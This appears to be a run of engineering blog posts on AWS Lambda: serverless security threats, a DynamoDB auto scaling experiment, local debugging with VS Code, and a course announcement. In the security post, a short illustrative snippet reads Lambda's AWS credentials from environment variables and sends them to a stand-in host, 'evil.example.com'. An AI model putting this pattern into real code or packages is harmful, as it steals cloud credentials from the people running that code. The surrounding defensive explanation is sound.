Many-faced threats to Serverless security

Threats to the security of our serverless applications take many forms: some are the same old foes we have faced before; some are new; and some have taken on new forms in the serverless world.

As we adopt the serverless paradigm for building cloud-hosted applications, we delegate even more of the operational responsibilities to our cloud providers. When you build a serverless architecture around AWS Lambda you no longer have to configure AMIs, patch the OS, or install daemons to collect and distribute logs and metrics for your application. AWS takes care of all of that for you.

What does this mean for the Shared Responsibility Model that has long been the cornerstone of security in the AWS cloud?

Protection from attacks against the OS

AWS takes over the responsibility for maintaining the host OS as part of its core competency, thereby alleviating you of the rigorous task of applying the latest security patches – something most of us just don’t do a good enough job of, as it’s not our primary focus.

In doing so, it protects us from attacks against known vulnerabilities in the OS and prevents attacks such as WannaCry.

Also, by removing long-lived servers from the picture, we remove the threat posed by compromised servers that linger in our environment for a long time.

WannaCry happened because the MS17-010 security patch was not applied to the affected hosts.

However, it is still our responsibility to patch our application and address vulnerabilities that exist in our code and our dependencies.

OWASP top 10 is still as relevant as ever

Aside from a few reclassifications the OWASP top 10 list has largely stayed the same in 7 years.

A glance at the OWASP top 10 list for 2017 shows us some familiar threats – Injection, Cross-Site Scripting, Sensitive Data Exposure, and so on.

A9 – Components with Known Vulnerabilities

When the folks at Snyk looked at a dataset of 1792 data breaches in 2016 they found that 12 of the top 50 data breaches were caused by applications using components with known vulnerabilities.

Furthermore, 77% of the top 5000 URLs from Alexa include at least one vulnerable library. This is less surprising than it first sounds when you consider that some of the most popular front-end js frameworks – eg. jquery, Angular and React – have all had known vulnerabilities. It highlights the need to continuously update and patch your dependencies.

However, unlike OS patches which are standalone, trusted and easy to apply, security updates to these 3rd party dependencies are usually bundled with feature and API changes that need to be integrated and tested. It makes our lives as developers difficult, and it’s yet another thing we have to do when we’re working overtime to ship new features.

And then there’s the matter of transitive dependencies, and boy are there many of them… If these transitive dependencies have vulnerabilities, then you too are vulnerable through your direct dependencies.

https://david-dm.org/request/request?view=tree

Finding vulnerabilities in our dependencies is hard work and requires constant diligence, which is why services such as Snyk are so useful. It even comes with built-in integration with Lambda!

Attacks against NPM publishers

What if the author/publisher of your 3rd party dependency is not who you think they are?

Just a few weeks ago, a security bounty hunter posted this amazing thread on how he managed to gain direct push rights to 14% of NPM packages. The list of affected packages includes some big names too: debug, request, react, co, express, moment, gulp, mongoose, mysql, bower, browserify, electron, jasmine, cheerio, modernizr, redux and many more. In total, these packages account for 20% of the total number of monthly downloads from NPM.

Let that sink in for a moment.

Did he use highly sophisticated methods to circumvent NPM’s security?

Nope, it was a combination of brute force and using known account & credential leaks from a number of sources including Github. In other words, anyone could have pulled this off with very little research.

It’s hard not to feel let down by these package authors when so many display such a cavalier attitude towards securing access to their NPM accounts. I feel my trust in these 3rd party dependencies has been betrayed.

662 users had password «123456», 174 – «123», 124 – «password».

1409 users (1%) used their username as their password, in its original form, without any modifications.

11% of users reused their leaked passwords: 10.6% – directly, and 0.7% – with very minor modifications.

As I demonstrated in my recent talk on Serverless security, one can easily steal temporary AWS credentials from affected Lambda functions (or EC2-hosted Node.js applications) with a few lines of code.
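
To illustrate, here is a minimal sketch of what such an exfiltration could look like (the collection endpoint is made up for illustration). Lambda exposes the function’s temporary credentials as environment variables, so any code running inside the function, including a compromised dependency, can read them:

```js
// Sketch of what a malicious dependency could do inside a Lambda function.
// The endpoint below is hypothetical; the point is that the temporary
// credentials are sitting in plain sight in the environment.
const https = require('https');

const stolen = {
  accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  sessionToken: process.env.AWS_SESSION_TOKEN
};

const req = https.request({
  hostname: 'evil.example.com', // hypothetical collection endpoint
  method: 'POST',
  path: '/collect',
  headers: { 'Content-Type': 'application/json' }
});
req.end(JSON.stringify(stolen));
```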

Imagine then, a scenario where an attacker had managed to gain push rights to 14% of all NPM packages. He could publish a patch update to all these packages and steal AWS credentials at a massive scale.

The stakes are high and it’s quite possibly the biggest security threat we face in the serverless world; and it’s equally threatening to applications hosted in containers or VMs.

The problems and risks with package management are not specific to the Node.js ecosystem. I have spent most of my career working with .Net technologies and am now working with Scala at Space Ape Games; package management has been a challenge everywhere. Whether you’re talking about Nuget, Maven, or any other package repository, you’re always at risk if the authors of your dependencies do not exercise the same due diligence in securing their accounts as they would their own applications.

Or, perhaps they do…

A1 – Injection & A3 – XSS

SQL injection and other forms of injection attacks are still possible in the serverless world, as are cross-site scripting attacks.

Even if you’re using a NoSQL database, you’re not necessarily exempt from injection attacks. MongoDB, for instance, exposes a number of attack vectors through its query APIs.

Arguably DynamoDB’s API makes it hard (at least I haven’t heard of a way yet) for an attacker to orchestrate an injection attack, but you’re still open to other forms of exploits – eg. XSS, or leaked credentials which grant an attacker access to your DynamoDB tables.

Nonetheless, you should always sanitize user inputs, as well as the output from your Lambda functions.
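
As a minimal sketch (the validation rules and handler shape are illustrative, and in practice you would lean on a well-tested library for escaping), an API Gateway handler might whitelist its input and escape its output like so:

```js
// Sketch: whitelist user input on the way in, escape it on the way out.
// The validation rules are illustrative; adapt them to your own payloads.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));

module.exports.handler = async (event) => {
  const name = (event.queryStringParameters || {}).name || '';

  // reject anything outside the characters we expect, rather than trying to
  // blacklist every dangerous character
  if (!/^[a-zA-Z0-9 _-]{1,64}$/.test(name)) {
    return { statusCode: 400, body: 'invalid "name" parameter' };
  }

  // escape the value before embedding it in the response body
  return { statusCode: 200, body: `<p>hello ${escapeHtml(name)}</p>` };
};
```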

A6 – Sensitive Data Exposure

Along with servers, web frameworks also disappear when you migrate to the serverless paradigm. These web frameworks have served us well for many years, but they also handed us a loaded gun we could shoot ourselves in the foot with.

As Troy Hunt demonstrated in a recent talk at the LDNUG, we can expose all kinds of sensitive data simply by leaving directory listing options on – from web.config files containing credentials (at 35:28) to SQL backup files (at 1:17:28)!

With API Gateway and Lambda, accidental exposures like this become very unlikely – directory listing is a “feature” you’d have to implement yourself. It forces you to make very conscious decisions about when to support directory listing and the answer is probably never.

IAM

If your Lambda functions are compromised, then the next line of defence is to restrict what these compromised functions can do.

This is why you need to apply the Least Privilege Principle when configuring Lambda permissions.

In the Serverless framework, the default behaviour is to use the same IAM role for all functions in the service.

However, the serverless.yml spec allows you to specify a different IAM role per function, although as you can see from the examples it involves a lot more development effort and (in my experience) adds enough friction that almost no one does this…

Apply per-function IAM policies.

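For reference, here is a rough sketch of what a per-function role looks like in serverless.yml (the function, table and role names are made up, and a custom role also needs to grant the CloudWatch Logs permissions the shared role would otherwise provide):

```yaml
functions:
  save-order:
    handler: functions/save-order.handler
    role: SaveOrderRole            # opt this function out of the shared role

resources:
  Resources:
    SaveOrderRole:
      Type: AWS::IAM::Role
      Properties:
        AssumeRolePolicyDocument:
          Version: '2012-10-17'
          Statement:
            - Effect: Allow
              Principal: { Service: lambda.amazonaws.com }
              Action: sts:AssumeRole
        Policies:
          - PolicyName: save-order-least-privilege
            PolicyDocument:
              Version: '2012-10-17'
              Statement:
                - Effect: Allow            # only the one action this function needs
                  Action: dynamodb:PutItem
                  Resource: arn:aws:dynamodb:*:*:table/orders
                - Effect: Allow            # logging permissions the shared role normally provides
                  Action:
                    - logs:CreateLogGroup
                    - logs:CreateLogStream
                    - logs:PutLogEvents
                  Resource: arn:aws:logs:*:*:*
```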

IAM policy not versioned with Lambda

A shortcoming with the current Lambda + IAM configuration is that IAM policies are not versioned along with the Lambda function.

In the scenario where you have multiple versions of the same function in active use (perhaps with different aliases), then it becomes problematic to add or remove permissions:

  • adding a new permission to a new version of the function allows old versions of the function additional access that they don’t require (and poses a vulnerability)
  • removing an existing permission from a new version of the function can break old versions of the function that still require that permission

Since the 1.0 release of the Serverless framework this has become less of a problem, as it no longer uses aliases for stages – instead, each stage is deployed as a separate function, eg.

  • service-function-dev
  • service-function-staging
  • service-function-prod

which means it’s far less likely that you’ll need to have multiple versions of the same function in active use.

I have also found (from personal experience) that account-level isolation can help mitigate the problems of adding/removing permissions, and crucially, the isolation also helps compartmentalise security breaches – eg. a compromised function running in a non-production account cannot be used to cause harm in the production account and impact your users.

We can apply the same idea of bulkheads (which has been popularised in the microservices world by Michael Nygard’s “Release It”) and compartmentalise security breaches at an account level.

Delete unused functions

One of the benefits of the serverless paradigm is that you don’t pay for functions when they’re not used.

The flip side of this property is that you have less need to remove unused functions since they don’t show up on your bill. However, these functions still exist as attack surface, even more so than actively used functions because they’re less likely to be updated and patched. Over time, these unused functions can become a hotbed for components with known vulnerabilities that attackers can exploit.

Lambda’s documentation also cites this as one of the best practices.

Delete old Lambda functions that you are no longer using.

The changing face of DoS attacks

With AWS Lambda you are far more likely to scale your way out of a DoS attack. However, scaling your serverless architecture aggressively to fight a DoS attack with brute force has a significant cost implication.

No wonder people started calling DoS attacks against serverless applications Denial of Wallet (DoW) attacks!

“But you can just throttle the no. of concurrent invocations, right?”

Sure, and you end up with a DoS problem instead… it’s a lose-lose situation.

AWS recently introduced AWS Shield, but at the time of writing the cost protection (which you only get if you pay a monthly flat fee for AWS Shield Advanced) does not cover Lambda costs incurred during a DoS attack.

For a monthly flat fee, AWS Shield Advanced gives you cost protection in the event of a DoS attack, but that protection does not cover Lambda yet.

Also, Lambda has an at-least-once invocation policy. According to the folks at SunGard, this can result in up to 3 (successful) invocations. From the article, the reported rate of multiple invocations is extremely low – 0.02% – but one wonders if the rate is tied to the load and might manifest itself at a much higher rate during a DoS attack.

Taken from the “Run, Lambda, Run” article mentioned above.

Furthermore, you need to consider how Lambda retries failed invocations from asynchronous event sources – eg. S3, SNS, SES, CloudWatch Events, etc. Officially, these invocations are retried twice before they’re sent to the assigned DLQ (if any).

However, an analysis by the OpsGenie guys showed that the no. of retries is not carved in stone and can go as high as 6 before the invocation is sent to the DLQ.

If the DoS attacker is able to trigger failed async invocations (perhaps by uploading files to S3 that cause your function to throw an exception when it attempts to process them) then they can significantly magnify the impact of their attack.

All these add up to the potential for the actual no. of Lambda invocations to explode during a DoS attack. As we discussed earlier, whilst your infrastructure might be able to handle the attack, can your wallet stretch to the same extent? Should you allow it to?

Securing external data

Just a handful of the places you could be storing state outside of your stateless Lambda function.

Due to the ephemeral nature of Lambda functions, chances are all of your functions are stateless. More than ever, state is stored in external systems and we need to secure it both at rest and in transit.

Communication with AWS services is over HTTPS and every request needs to be signed and authenticated. A handful of AWS services also offer server-side encryption for your data at rest – S3, RDS and Kinesis streams spring to mind – and Lambda has built-in integration with KMS to encrypt your functions’ environment variables.
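
For example, here is a sketch of reading a KMS-encrypted environment variable inside a function (DB_PASSWORD is a hypothetical variable name, encrypted with a key the function’s IAM role is allowed to use):

```js
// Sketch: decrypt a KMS-encrypted environment variable at cold start.
// DB_PASSWORD is a hypothetical variable, encrypted with a KMS key that
// this function's IAM role has kms:Decrypt permission on.
const AWS = require('aws-sdk');
const kms = new AWS.KMS();

let dbPassword; // cached for subsequent invocations of the same container

const decrypt = async () => {
  if (!dbPassword) {
    const res = await kms.decrypt({
      CiphertextBlob: Buffer.from(process.env.DB_PASSWORD, 'base64')
    }).promise();
    dbPassword = res.Plaintext.toString('utf8');
  }
  return dbPassword;
};

module.exports.handler = async (event) => {
  const password = await decrypt();
  // ... use the decrypted secret here, and never log it
  return { statusCode: 200 };
};
```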

The same diligence needs to be applied when storing sensitive data in services/DBs that do not offer built-in encryption – eg. DynamoDB, Elasticsearch, etc. – to ensure it is protected at rest. In the case of a data breach, this provides another layer of protection for our users’ data.

We owe our users that much.

Use secure transport when transmitting data to and from services (both external and internal ones). If you’re building APIs with API Gateway and Lambda then you’re forced to use HTTPS by default, which is a good thing. However, API Gateway is always publicly accessible and you need to take the necessary precautions to secure access to internal APIs.

You can use API keys, but I think it’s better to use IAM roles. IAM gives you fine-grained control over who can invoke which actions on which resources. Also, using IAM roles spares you from awkward conversations like this:

“It’s X’s last day, he probably has our API keys on his laptop somewhere, should we rotate the API keys just in case?”

“mm.. that’d be a lot of work, X is trustworthy, he’s not gonna do anything.”

“ok… if you say so… (secretly pray X doesn’t lose his laptop or develop a belated grudge against the company)”

Fortunately, both can be easily configured using the Serverless framework.
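
As a rough sketch (the names are illustrative, and it’s worth checking the framework docs for the exact syntax), the two options look something like this in serverless.yml:

```yaml
provider:
  name: aws
  apiKeys:
    - internal-client-key         # option 1: an API key distributed to callers

functions:
  internal-api:
    handler: functions/internal.handler
    events:
      - http:
          path: internal/do-something
          method: post
          private: true           # require the API key
          # option 2 (preferred): require callers to sign requests with IAM credentials
          # authorizer: aws_iam
```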

Leaked credentials

Don’t become an unwilling bitcoin miner.

The internet is full of horror stories of developers racking up a massive AWS bill after their leaked credentials were used by cyber-criminals to mine bitcoins. For every such story, many more people will have been affected but chose to stay silent (for the same reason many security breaches are not announced publicly – big companies do not want to appear incompetent).

Even within my small social circle (*sobs*) I have heard of 2 such incidents; neither was made public and both resulted in over $100k worth of damages. Fortunately, in both cases AWS agreed to cover the cost.

I know for a fact that AWS actively scans public Github repos for active AWS credentials and tries to alert you as soon as possible. But as some of the above stories mentioned, even if your credentials were only leaked for a brief window of time, they will not escape the watchful gaze of attackers (plus, they still exist in the git commit history unless you rewrite that too, so it’s best to deactivate the credentials if possible).

A good approach to prevent AWS credential leaks is to use git pre-commit hooks as outlined by this post.

Conclusions

We looked at a number of security threats to our serverless applications in this post; many of them are the same threats that have plagued the software industry for years. All of the OWASP top 10 still apply to us, including SQL, NoSQL and other forms of injection attacks.

Leaked AWS credentials remain a major issue and can potentially impact any organisation that uses AWS. Whilst there are quite a few publicly reported incidents, I have a strong feeling that the actual no. of incidents is much, much higher.

We are still responsible for securing our users’ data both at rest and in transit. API Gateway is always publicly accessible, so we need to take the necessary precautions to secure access to our internal APIs, preferably with IAM roles. IAM offers fine-grained control over who can invoke which actions on your API resources, and makes it easy to manage access when employees come and go.

On a positive note, having AWS take over the responsibility for the security of the host OS gives us a no. of security benefits:

  • protection against OS attacks because AWS can do a much better job of patching known vulnerabilities in the OS
  • the host OS is ephemeral, which means no long-lived compromised servers
  • it’s much harder to accidentally leave sensitive data exposed by forgetting to turn off directory listing options in a web framework – because you no longer need such web frameworks!

DoS attacks have taken a new form in the serverless world. Whilst you’re probably able to scale your way out of an attack, it’ll still hurt you in the wallet, hence why they have become known in the serverless world as Denial of Wallet attacks. Lambda costs incurred during a DoS attack are not covered by AWS Shield Advanced at the time of writing, but hopefully they will be in the near future.

Meanwhile, some new attack surfaces have emerged with AWS Lambda:

  • functions are often given too much permission because they’re not given individual IAM policies tailored to their needs; a compromised function can therefore do more harm than it otherwise might
  • unused functions are often left around for a long time as there is no cost associated with them, but attackers might be able to exploit them especially if they’re not actively maintained and therefore are likely to contain known vulnerabilities

Above all, the most worrisome threat for me is attacks against the package authors themselves. It has been shown that many authors do not take the security of their accounts seriously, and in doing so they endanger themselves as well as the rest of the community that depends on them. Such attacks are nearly impossible to guard against, and they erode one of the strongest aspects of any software ecosystem – the community behind it.

Once again, people have proven to be the weakest link in the security chain.

The problems with DynamoDB Auto Scaling and how it might be improved

TL;DR – AWS announced the long awaited auto scaling capability for DynamoDB, but we found it takes too long to scale up and doesn’t scale up aggressively enough, as it’s held back by using consumed capacity as the scaling metric rather than the actual request count.

Here at Space Ape Games we developed an in-house tech to auto scale DynamoDB throughput and have used it successfully in production for a few years. It’s even integrated with our LiveOps tooling and scales up our DynamoDB tables according to the schedule of live events. This way, our tables are always provisioned just ahead of that inevitable spike in traffic at the start of an event.

Auto scaling DynamoDB is a common problem for AWS customers; I have personally implemented similar tech to deal with this problem at two previous companies. Whilst at Yubl, I even applied the same technique to auto scale Kinesis streams too.

When AWS announced DynamoDB Auto Scaling we were excited. However, the blog post that accompanied the announcement illustrated two problems:

  • the reaction time to scaling up is slow (10–15 mins)
  • it did not scale sufficiently to maintain the 70% utilization level

Notice the high no. of throttled operations despite the scaling activity. If you were scaling the table manually, would you have settled for this result?

It looks as though the author’s test did not match the kind of workload that DynamoDB Auto Scaling is designed to accommodate.

In our case, we also have a high write-to-read ratio (typically around 1:1) because every action the players perform in a game changes their state in some way. So unfortunately we can’t use DAX as a get-out-of-jail free card.

How DynamoDB auto scaling works

When you modify the auto scaling settings on a table’s read or write throughput, it automatically creates/updates CloudWatch alarms for that table – four for writes and four for reads.

As you can see from the screenshot below, DynamoDB auto scaling uses CloudWatch alarms to trigger scaling actions. When the consumed capacity units breach the utilization level on the table (which defaults to 70%) for 5 consecutive minutes, it will then scale up the corresponding provisioned capacity units.

Problems with the current system, and how it might be improved

From our own tests we found DynamoDB’s lacklustre performance at scaling up is rooted in 2 problems:

  1. The CloudWatch alarms require 5 consecutive threshold breaches. When you take into account the latency in CloudWatch metrics (which are typically a few mins behind), it means scaling actions occur up to 10 mins after the specified utilization level is first breached. This reaction time is too slow.
  2. The new provisioned capacity units are calculated based on consumed capacity units rather than the actual request count. Consumed capacity is itself constrained by the provisioned capacity, even though it’s possible to temporarily exceed it with burst capacity. What this means is that once you’ve exhausted the saved burst capacity, the actual request count can start to outpace the consumed capacity units, and scaling up is not able to keep pace with the increase in actual request count. We will see the effect of this in the results from the control group later.

Based on these observations, we hypothesize that you can make two modifications to the system to improve its effectiveness:

  1. trigger scaling up after 1 threshold breach instead of 5, which is in line with the mantra of “scale up early, scale down slowly”.
  2. trigger scaling activity based on actual request count instead of consumed capacity units, and calculate the new provisioned capacity units using actual request count as well.

As part of this experiment, we also prototyped these changes (by hijacking the CloudWatch alarms) to demonstrate their improvement.

Testing Methodology

The most important thing for this test is a reliable and reproducible way of generating the desired traffic patterns.

To do that, we have a recursive function that makes BatchWrite requests against the DynamoDB table under test every second. The items-per-second rate is calculated based on the elapsed time (t) in seconds, which gives us a lot of flexibility to shape the traffic pattern we want.

Since a Lambda function can only run for a max of 5 mins, when context.getRemainingTimeInMillis() is less than 2000 the function will recurse and pass the last recorded elapsed time (t) in the payload for the next invocation.
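
Here is a simplified sketch of that load generator (the table name, item shape and rate function are placeholders; the real thing shapes the rate to produce the traffic patterns described below):

```js
// Sketch: recursive Lambda that writes to DynamoDB at a rate derived from
// the elapsed time t, and re-invokes itself before it times out.
const AWS = require('aws-sdk');
const dynamodb = new AWS.DynamoDB.DocumentClient();
const lambda = new AWS.Lambda();

const TABLE_NAME = process.env.TABLE_NAME;  // table under test
const ratePerSecond = (t) => 25 + t;        // placeholder: shape the traffic however you like

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

module.exports.handler = async (event, context) => {
  let t = event.t || 0;

  while (context.getRemainingTimeInMillis() > 2000) {
    const count = ratePerSecond(t);
    const requests = Array.from({ length: count }, (_, i) => ({
      PutRequest: { Item: { id: `${t}-${i}`, payload: Date.now() } }
    }));

    // BatchWrite accepts at most 25 items per call, so chunk the requests
    // (a real test should also retry any UnprocessedItems in the response)
    for (let i = 0; i < requests.length; i += 25) {
      await dynamodb.batchWrite({
        RequestItems: { [TABLE_NAME]: requests.slice(i, i + 25) }
      }).promise();
    }

    await sleep(1000);
    t += 1;
  }

  // recurse: hand the elapsed time to the next invocation
  await lambda.invoke({
    FunctionName: context.functionName,
    InvocationType: 'Event',
    Payload: JSON.stringify({ t })
  }).promise();
};
```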

The result is a continuous, smooth traffic pattern you see below.

We tested with 2 traffic patterns we see regularly.

Bell Curve

This should be a familiar traffic pattern for most – a slow & steady buildup of traffic from the trough to the peak, followed by a faster drop off as users go to sleep. After a period of steady traffic throughout the night things start to pick up again the next day.

For many of us whose user base is concentrated in the North America region, the peak is usually around 3–4am UK time – all the more reason we need DynamoDB Auto Scaling to do its job and not wake us up!

This traffic pattern is characterised by a) steady traffic at the trough, b) slow & steady build up towards the peak, c) fast drop off towards the trough, and repeat.

Top Heavy

This sudden burst of traffic is usually precipitated by an event – a marketing campaign, a promotion by the app store, or in our case a scheduled LiveOps event.

In most cases these events are predictable and we scale up DynamoDB tables ahead of time via our automated tooling. However, in the unlikely event of an unplanned burst of traffic (and it has happened to us a few times) a good auto scaling system should scale up quickly and aggressively to minimise the disruption to our players.

This pattern is characterised by a) a sharp climb in traffic, b) a slow & steady decline, c) traffic staying at a steady level until the anomaly finishes and it goes back to the Bell Curve again.

We tested these traffic patterns against several utilization level settings (the default is 70%) to see how the system handles them. We measured the performance of the system by:

  • the % of successful requests (ie. consumed capacity / request count)
  • the total no. of throttled requests during the test

These results will act as our control group.

We then tested the same traffic patterns against the 2 hypothetical auto scaling changes we proposed above.

To prototype the proposed changes we hijacked the CloudWatch alarms created by DynamoDB auto scaling using CloudWatch events.

When a PutMetricAlarm API call is made, our change_cw_alarm function is invoked and replaces the existing CloudWatch alarms with the relevant changes – ie. setting the EvaluationPeriods to 1 (a single 1-minute period) for hypothesis 1.

To avoid an invocation loop, the Lambda function will only make changes to the CloudWatch alarm if the EvaluationPeriod has not been changed to 1 min already.

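Here is a rough sketch of what such a function might look like. It assumes the PutMetricAlarm call arrives as a CloudTrail-backed CloudWatch Events event, and that the auto scaling alarms can be recognised by a TargetTracking-table/ name prefix; both are assumptions you would want to verify in your own account:

```js
// Sketch: re-create the alarms that DynamoDB auto scaling sets up, with
// EvaluationPeriods dropped from 5 to 1 (hypothesis 1).
const AWS = require('aws-sdk');
const cloudwatch = new AWS.CloudWatch();

module.exports.handler = async (event) => {
  // the original request parameters are carried in the CloudTrail event detail
  const params = event.detail.requestParameters;

  // only touch the auto scaling alarms, and bail out if we've already modified
  // this alarm, otherwise our own PutMetricAlarm call would trigger us again
  if (!params.alarmName.startsWith('TargetTracking-table/') ||
      params.evaluationPeriods === 1) {
    return;
  }

  await cloudwatch.putMetricAlarm({
    AlarmName: params.alarmName,
    AlarmActions: params.alarmActions,
    Namespace: params.namespace,
    MetricName: params.metricName,
    Dimensions: (params.dimensions || []).map(d => ({ Name: d.name, Value: d.value })),
    Statistic: params.statistic,
    Period: params.period,
    Threshold: params.threshold,
    ComparisonOperator: params.comparisonOperator,
    EvaluationPeriods: 1 // scale after a single breach instead of five
  }).promise();
};
```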

The change_cw_alarm function changed the breach threshold for the CloudWatch alarms to 1 min.

For hypothesis 2, we have to take over the responsibility of scaling up the table, as we need to calculate the new provisioned capacity units using a custom metric that tracks the actual request count. Hence the AlarmActions for the CloudWatch alarms are also overridden here.

The SNS topic is subscribed to a Lambda function which scales up the throughput of the table.

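A minimal sketch of that scale-up function (the custom metric namespace and name, the 1-minute window and the headroom calculation are all illustrative):

```js
// Sketch: SNS-triggered function that provisions write throughput from the
// *actual* request count (a custom metric), rather than consumed capacity.
const AWS = require('aws-sdk');
const cloudwatch = new AWS.CloudWatch();
const dynamodb = new AWS.DynamoDB();

const TABLE_NAME = process.env.TABLE_NAME;
const UTILIZATION = parseFloat(process.env.UTILIZATION || '0.7');

module.exports.handler = async () => {
  // actual request count over the last minute, published as a custom metric
  const end = new Date();
  const start = new Date(end.getTime() - 60 * 1000);
  const stats = await cloudwatch.getMetricStatistics({
    Namespace: 'LoadTest',              // hypothetical custom namespace
    MetricName: 'WriteRequestCount',    // hypothetical custom metric
    Dimensions: [{ Name: 'TableName', Value: TABLE_NAME }],
    StartTime: start,
    EndTime: end,
    Period: 60,
    Statistics: ['Sum']
  }).promise();

  const requestsPerSec = ((stats.Datapoints[0] || { Sum: 0 }).Sum) / 60;

  // provision enough capacity for the actual request rate to sit at the target utilization
  const newWriteCapacity = Math.ceil(requestsPerSec / UTILIZATION);

  const { Table } = await dynamodb.describeTable({ TableName: TABLE_NAME }).promise();
  const current = Table.ProvisionedThroughput;

  if (newWriteCapacity > current.WriteCapacityUnits) {
    await dynamodb.updateTable({
      TableName: TABLE_NAME,
      ProvisionedThroughput: {
        ReadCapacityUnits: current.ReadCapacityUnits,
        WriteCapacityUnits: newWriteCapacity
      }
    }).promise();
  }
};
```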

Results (Bell Curve)

The test is set up as follows:

  1. table starts off with 50 write capacity units
  2. traffic holds steady for 15 mins at 25 writes/s
  3. traffic then increases to peak level (300 writes/s) at a steady rate over the next 45 mins
  4. traffic drops off back to 25 writes/s at a steady rate over the next 15 mins
  5. traffic holds steady at 25 writes/s

All the units in the diagrams are SUM/min, which is how CloudWatch tracks ConsumedWriteCapacityUnits and WriteThrottleEvents; I had to normalise the ProvisionedWriteCapacityUnits (which is tracked as a per-second unit) to make them consistent.

Let’s start by seeing how the control group (vanilla DynamoDB auto scaling) performed at different utilization levels from 30% to 80%.

I’m not sure why the total consumed units and total request count metrics didn’t match exactly when the utilization is between 30% and 50%, but seeing as there were no throttled events I’m going to put that difference down to inaccuracies in CloudWatch.

I make several observations from these results:

  1. At 30%-50% utilization levels, write ops are never throttled – this is what we want to see in production.
  2. At the 60% utilization level, the slow reaction time (problem 1) caused writes to be throttled early on as the system adjusted to the steady increase in load, but it was eventually able to adapt.
  3. At the 70% and 80% utilization levels, things really fell apart. The growth in the actual request count outpaced the growth in consumed capacity units, and more and more write ops were throttled as the system failed to adapt to the new level of actual utilization (as opposed to the “allowed” utilization measured by consumed capacity units, ie problem 2).

Hypothesis 1 : scaling after 1 min breach

Some observations:

  1. At the 30%-50% utilization levels, there’s no difference in performance.
  2. At the 60% utilization level, the early throttled writes we saw in the control group are now addressed, as we decreased the reaction time of the system.
  3. At the 70%-80% utilization levels, there is negligible difference in performance. This is to be expected, as the poor performance in the control group is caused by problem 2, so improving reaction time alone is unlikely to significantly improve performance in these cases.

Hypothesis 2 : scaling after 1 min breach on actual request count

Scaling on actual request count and using actual request count to calculate the new provisioned capacity units yields amazing results. There were no throttled events at 30%-70% utilization levels.

Even at 80% utilization level both the success rate and total no. of throttled events have improved significantly.

This is an acceptable level of performance for an auto scaling system, one that I’d be happy to use in a production environment. Although, I’ll still err on the side of caution and choose a utilization level at or below 70% to give the table enough headroom to deal with sudden spikes in traffic.

Results (Top Heavy)

The test is set up as follows:

  1. table starts off with 50 write capacity units
  2. traffic holds steady for 15 mins at 25 writes/s
  3. traffic then jumps to peak level (300 writes/s) at a steady rate over the next 5 mins
  4. traffic then decreases at a rate of 3 writes/s per minute

Once again, let’s start by looking at the performance of the control group (vanilla DynamoDB auto scaling) at various utilization levels.

Some observations from the results above:

  1. At 30%-60% utilization levels, most of the throttled writes can be attributed to the slow reaction time (problem 1). Once the table started to scale up the no. of throttled writes quickly decreased.
  2. At the 70%-80% utilization levels, the system also didn’t scale up aggressively enough (problem 2). Hence we experienced throttled writes for much longer, resulting in much worse performance overall.

Hypothesis 1 : scaling after 1 min breach

Some observations:

  1. Across the board the performance has improved, especially at the 30%-60% utilization levels.
  2. At 70%-80% utilization levels we’re still seeing the effect of problem 2 – not scaling up aggressively enough. As a result, there’s still a long tail to the throttled write ops.

Hypothesis 2 : scaling after 1 min breach on actual request count

Similar to what we observed with the Bell Curve traffic pattern, this implementation is significantly better at coping with sudden spikes in traffic at all utilization levels tested.

Even at 80% utilization level (which really doesn’t leave you with a lot of head room) an impressive 94% of write operations succeeded (compared with 73% recorded by the control group). Whilst there is still a significant no. of throttled events, it compares favourably against the 500k+ count recorded by the vanilla DynamoDB auto scaling.

Conclusions

I like DynamoDB, and I would like to use its auto scaling capability out of the box but it just doesn’t quite match my expectations at the moment. I hope someone from AWS is reading this, and that this post provides sufficient proof (as you can see from the data below) that it can be vastly improved with relatively small changes.

Feel free to play around with the demo, all the code is available here.

Running and debugging AWS Lambda functions locally with the Serverless framework and VS Code

One of the complaints developers often have about AWS Lambda is the inability to run and debug functions locally. For Node.js at least, the Serverless framework and VS Code provide a good solution for doing just that.

An often underused feature of the Serverless framework is the invoke local command, which runs your code locally by emulating the AWS Lambda environment. Granted, it’s not a perfect simulation and it only works with Node.js and Python, but it has been good enough for most of my local development needs.

With VS Code, you have the ability to debug Node.js applications, including the option to launch an external program.

Put the two together and you have the ability to locally run and debug your Lambda functions.

Step 1 : install Serverless framework as dev dependency

In general, it’s a good idea to install Serverless framework as a dev dependency in a project because:

  1. it allows other developers (and the CI server) to use the Serverless framework for deployment without having to install it themselves
  2. it prevents incompatibility issues between the version of the Serverless framework you have installed and the version the project’s serverless.yml was written for
  3. since Serverless v1.16.0, dev dependencies are excluded from the deployment package so it won’t add to your deployment size (this is broken in the current version, v1.18.0, but should be fixed shortly)

Step 2 : add debug configuration

The debug configuration invokes the "sls invoke local" CLI command against the "hello" function with an empty object {} as input. It’s also possible to invoke the function with a JSON file – see the doc here.
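
A launch configuration along these lines (in .vscode/launch.json) does the trick; the function name hello matches the example above, and on Windows you may need to point at the serverless script itself rather than the .bin shim:

```json
{
  "version": "0.2.0",
  "configurations": [
    {
      "type": "node",
      "request": "launch",
      "name": "Debug hello (sls invoke local)",
      // run the locally installed Serverless framework under the debugger
      "program": "${workspaceRoot}/node_modules/.bin/sls",
      "args": ["invoke", "local", "-f", "hello", "-d", "{}"],
      "cwd": "${workspaceRoot}"
    }
  ]
}
```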

Step 3 : enjoy!

There, nice and easy :-)

A couple of things to note:

  • if your function depends on environment variables, then you can set those up in the launch.json config file in step 2
  • if your function needs to access other AWS resources, then you also need to setup the relevant environment variables (eg. AWS_PROFILE) for the aws-sdk to access those resources in the correct AWS account
  • this approach will not work for recursive functions (well, the recursion will happen on the deployed Lambda function, so you won’t be able to debug it)

I’m running a live course on designing serverless architecture with AWS Lambda

Hi everyone, just a quick note to let you know that I’m running a live online course with O’Reilly on designing serverless architectures with AWS Lambda.

It’s a 2-day course on September 11-12th with 6 hours in total, and it’s available for free if you have a subscription with SafariBooksOnline. Registration for the course is open till September 7th, so if there are still spaces available then you can even sign up for a free 10-day trial on SafariBooksOnline just before registration closes and get the course for free.

Sign up here.

The course will cover a variety of topics over the two days:

  • AWS Lambda basics
  • the Serverless framework
  • testing strategies
  • CI/CD
  • centralised logging
  • distributed tracing
  • monitoring
  • performance considerations including cold starts
  • config management
